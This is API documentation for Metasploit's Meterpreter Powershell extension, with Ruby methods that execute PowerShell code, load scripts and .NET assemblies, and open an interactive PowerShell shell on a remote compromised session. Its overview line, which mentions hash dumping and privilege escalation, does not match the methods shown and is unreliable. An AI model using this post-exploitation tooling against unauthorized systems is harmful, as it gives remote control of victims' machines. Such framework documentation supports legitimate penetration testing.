Class: Rex::Post::Meterpreter::Extensions::Powershell::Powershell
- Inherits:
-
Rex::Post::Meterpreter::Extension
- Object
- Rex::Post::Meterpreter::Extension
- Rex::Post::Meterpreter::Extensions::Powershell::Powershell
- Defined in:
- lib/rex/post/meterpreter/extensions/powershell/powershell.rb
Overview
This meterpreter extension provides a privilege escalation interface that is capable of doing things like dumping password hashes and performing local exploitation.
Instance Attribute Summary
Attributes inherited from Rex::Post::Meterpreter::Extension
Class Method Summary collapse
Instance Method Summary collapse
- #execute_string(opts = {}) ⇒ Object
- #import_file(opts = {}) ⇒ Object
-
#initialize(client) ⇒ Powershell
constructor
A new instance of Powershell.
- #session_remove(opts = {}) ⇒ Object
- #shell(opts = {}) ⇒ Object
Constructor Details
#initialize(client) ⇒ Powershell
Returns a new instance of Powershell.
# File 'lib/rex/post/meterpreter/extensions/powershell/powershell.rb', line 25
# Builds the wrapper for the 'powershell' Meterpreter extension and
# registers the 'powershell' alias on the client, pointing at this instance.
#
# @param client [Object] the Meterpreter client this extension belongs to
def initialize(client)
  super(client, 'powershell')
  aliases = [{ 'name' => 'powershell', 'ext' => self }]
  client.register_extension_aliases(aliases)
end
Class Method Details
.extension_id ⇒ Object
# File 'lib/rex/post/meterpreter/extensions/powershell/powershell.rb', line 21
class << self
  # Identifier this extension is registered under.
  #
  # @return [Object] the value of the EXTENSION_ID_POWERSHELL constant
  def extension_id
    EXTENSION_ID_POWERSHELL
  end
end
Instance Method Details
#execute_string(opts = {}) ⇒ Object
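# File 'lib/rex/post/meterpreter/extensions/powershell/powershell.rb', line 70
# Runs a string of PowerShell code on the remote session and returns its
# output.
#
# @param opts [Hash]
# @option opts [String] :code the PowerShell code to execute (required)
# @option opts [String] :session_id optional PowerShell session identifier,
#   sent as TLV_TYPE_POWERSHELL_SESSIONID when present
# @return [Hash, nil] nil when :code is missing; otherwise a hash with
#   :output (the TLV_TYPE_POWERSHELL_RESULT value) and, when the client
#   currently holds a non-zero token handle, a :warning string
def execute_string(opts = {})
  return nil unless opts[:code]

  request = Packet.create_request(COMMAND_ID_POWERSHELL_EXECUTE)
  request.add_tlv(TLV_TYPE_POWERSHELL_CODE, opts[:code])
  request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]
  response = client.send_request(request)

  result = {}
  # A non-zero token handle is treated as active impersonation; per the
  # warning text, that token does not carry over to PowerShell, so tell the
  # operator instead of silently running the code under a different identity.
  result[:warning] = 'Impersonation will not apply to PowerShell.' if client.sys.config.get_token_handle != 0
  result[:output] = response.get_tlv_value(TLV_TYPE_POWERSHELL_RESULT)
  result
end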
#import_file(opts = {}) ⇒ Object
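# File 'lib/rex/post/meterpreter/extensions/powershell/powershell.rb', line 38
# Loads a file from the local filesystem into the remote PowerShell session.
# A '.ps1' file is read as text and executed via #execute_string; a '.dll'
# file is read as raw bytes and sent to the remote side as an assembly to
# load. Any other extension is ignored. The suffix checks are case-sensitive.
#
# @param opts [Hash]
# @option opts [String] :file local path of the script or assembly (required)
# @option opts [String] :session_id forwarded to #execute_string for scripts
# @return [Hash, nil] nil when :file is missing; the #execute_string result
#   for a script; { loaded: true } after an assembly has been sent;
#   { loaded: false } for an unrecognised extension
def import_file(opts = {})
  path = opts[:file]
  return nil unless path

  # Scripts are plain source text, so hand them to execute_string. Merge
  # into a new hash rather than writing :code into the caller's opts.
  return execute_string(opts.merge(code: ::File.read(path))) if path.end_with?('.ps1')

  # Anything that is not a DLL (hopefully a .NET 2.0 one) is not handled.
  return { loaded: false } unless path.end_with?('.dll')

  # TODO: perhaps do some kind of check to see if the DLL is a .NET assembly?
  # Read in binary mode: a text-mode read would apply newline conversion on
  # Windows hosts and return a string tagged with the default external
  # encoding, whose #length counts characters rather than bytes, so the
  # size TLV could disagree with the bytes actually sent.
  binary = ::File.binread(path)
  request = Packet.create_request(COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD)
  request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY_SIZE, binary.bytesize)
  request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY, binary)
  client.send_request(request)
  { loaded: true }
end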
#session_remove(opts = {}) ⇒ Object
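# File 'lib/rex/post/meterpreter/extensions/powershell/powershell.rb', line 62
# Asks the remote side to remove a PowerShell session.
#
# @param opts [Hash]
# @option opts [String] :session_id identifier of the session to remove (required)
# @return [Boolean] false when :session_id is missing; true once the request
#   has been sent (the response is not inspected)
def session_remove(opts = {})
  session_id = opts[:session_id]
  return false unless session_id

  request = Packet.create_request(COMMAND_ID_POWERSHELL_SESSION_REMOVE)
  # The guard above guarantees a session id, so the TLV is always added;
  # the original conditional here could never be false.
  request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, session_id)
  client.send_request(request)
  true
end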
#shell(opts = {}) ⇒ Object
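# File 'lib/rex/post/meterpreter/extensions/powershell/powershell.rb', line 88
# Opens an interactive PowerShell channel on the remote session.
#
# @param opts [Hash]
# @option opts [String] :session_id optional PowerShell session identifier,
#   sent as TLV_TYPE_POWERSHELL_SESSIONID when present
# @return [Hash] :channel holding a synchronous StreamPool channel built from
#   the returned channel id, plus a :warning string when the client currently
#   holds a non-zero token handle
# @raise [RuntimeError] when the response carries no channel id
def shell(opts = {})
  request = Packet.create_request(COMMAND_ID_POWERSHELL_SHELL)
  request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]
  response = client.send_request(request)

  channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)
  # Raise a StandardError (RuntimeError) rather than bare Exception so that
  # ordinary `rescue => e` clauses in callers can handle the failure.
  raise 'We did not get a channel back!' if channel_id.nil?

  result = {}
  # A non-zero token handle is treated as active impersonation; per the
  # warning text, that token does not carry over to the PowerShell channel.
  result[:warning] = 'Impersonation will not apply to PowerShell.' if client.sys.config.get_token_handle != 0
  result[:channel] = Rex::Post::Meterpreter::Channels::Pools::StreamPool.new(
    client, channel_id, 'powershell_psh', CHANNEL_FLAG_SYNCHRONOUS, response
  )
  result
end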